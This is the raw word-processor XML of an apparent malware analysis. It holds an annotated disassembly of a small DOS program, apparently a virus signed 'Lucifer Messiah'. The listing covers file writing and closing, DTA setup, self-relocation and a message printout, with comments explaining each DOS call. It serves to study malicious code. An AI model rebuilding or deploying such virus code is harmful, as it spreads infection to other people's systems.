    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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EB 16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jmp short loc_1020C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jmp to loc_1020C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seg000:01F6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seg000:01F6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widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0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seg000:01F6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loc_101F6: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seg000:01B5â†‘j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spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1933.63891601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seg000:01F6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B8 00 42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4200h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4200h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2B D2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dx, dx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clear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CA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dx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clear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seg000:01FD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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5760" w:right="2812.03857421875" w:firstLine="72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int 21h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seg000:01FE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FE C6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inc </w:t>
        <w:tab/>
        <w:t xml:space="preserve">dh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increment dh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40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40h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'@'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function 40h “Write To A File Or Device”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0D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[di]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000?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seg000:0204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81 C1 A3 01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add </w:t>
        <w:tab/>
        <w:t xml:space="preserve">cx,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1A3h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cx = 1A3h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 int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0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seg000:0209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3E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3Eh </w:t>
        <w:tab/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'&gt;'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function 3Eh “Close A File Handler”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5.00976562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ab/>
        <w:t xml:space="preserve">3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0"/>
        <w:spacing w:before="5.00976562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 int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2812.03857421875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="800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seg000:020C</w:t>
      </w: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spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1494.438476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seg000:020C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loc_1020C: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CODE XREF: seg000:loc_1018Câ†‘j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before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1494.4384765625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seg000:020C </w:t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; seg000:01F4â†‘j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pacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1494.4384765625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8C D0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ax, ss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ss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seg000:020E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8E C0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es,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ss into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8E D8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ds, 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move ss into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seg000:0212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assume ds:seg000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50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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ax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push ax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seg000:0213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B4 1A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ah,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1Ah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function 1Ah “Set Disk Transfer Area Address (DTA)”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seg000:0215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D1 EA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shr </w:t>
        <w:tab/>
        <w:t xml:space="preserve">dx, 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shift dx right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seg000:0217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int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5.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3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Trap to Debugger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 int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2812.03857421875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff800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seg000:0218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BF 00 01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di, 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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">100h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff8000"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684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100h into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5.00976562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seg000:021B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57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push </w:t>
        <w:tab/>
        <w:t xml:space="preserve">di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push di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seg000:021C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8B CC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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">cx, sp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move sp into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seg000:021E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2B CE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sub </w:t>
        <w:tab/>
        <w:t xml:space="preserve">cx, si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; subtract si from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seg000:0220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F3 A4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rep </w:t>
        <w:tab/>
        <w:t xml:space="preserve">movsb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write cx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3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000080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seg000:0222 </w:t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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CB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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">retf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000080"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684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5.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; return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5.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seg000:0222 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spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1148.22998046875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2c2c2c"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684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5.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;implicit language declarations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="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2A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2Ah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57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57h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W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2E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2Eh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.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?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6E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6Eh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seg000:022F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66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66h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3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!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2C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2Ch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,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a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72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72h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seg000:023F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76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76h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v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72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72h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62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62h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b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!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line="199.92000102996826" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808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seg000:024F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9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37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37h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7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28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28h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)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9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9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A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4E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4Eh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seg000:025F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A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52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52h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4B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4Bh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4B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4Bh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D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3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4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0Dh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0A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0Ah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6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seg000:026F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8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9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A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B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1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36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36h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6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3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A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6E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6Eh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seg000:027F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76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76h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v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72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72h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6B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6Bh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3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2E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2Eh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.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4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seg000:028F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7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D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E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68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68h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h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3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6E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6Eh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seg000:029F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!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8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$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;terminator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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seg000:02A3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D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826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B4 09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mov ah,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 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; function 9h “Print String”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff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BA 09 01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mov dx, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff8000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">109h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff8000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; DS:109h display string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F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CC 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3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; Trap to Debugger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</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180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; int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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B4 4C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mov ah,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4Ch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'L'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  <w:tab/>
        <w:t xml:space="preserve">; function 4Ch “Terminate a Process (EXIT)”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182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CC 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3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; Trap to Debugger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3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; int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seg000:02AB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5B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5Bh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  <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; [DOS 7v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☺☺☺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] Lucifer Messiah$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4F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4Fh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8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seg000:02AF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9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37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37h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7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76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76h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v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C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D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E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8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5D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5Dh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]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0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1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seg000:02B8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4C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4Ch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2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seg000:02B9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3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seg000:02BA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4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seg000:02BB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5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66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66h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6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seg000:02BD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7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seg000:02BE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72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72h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8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="00804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seg000:02BF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20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20h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9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seg000:02C0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4D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4Dh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A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seg000:02C1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65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65h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B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seg000:02C2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C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seg000:02C3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73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73h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D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seg000:02C4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69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69h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E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seg000:02C5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61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61h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a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9F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seg000:02C6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68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68h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h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A0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.9200010299682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24 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="00008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040"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">24h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$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A1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seg000 ends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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;end of seg000/prog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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seg000:02C7</w:t>
      </w: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A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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seg000:02C7</w:t>
      </w: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A4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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seg000:02C7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end start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A5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199.92000102996826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199.9200010299682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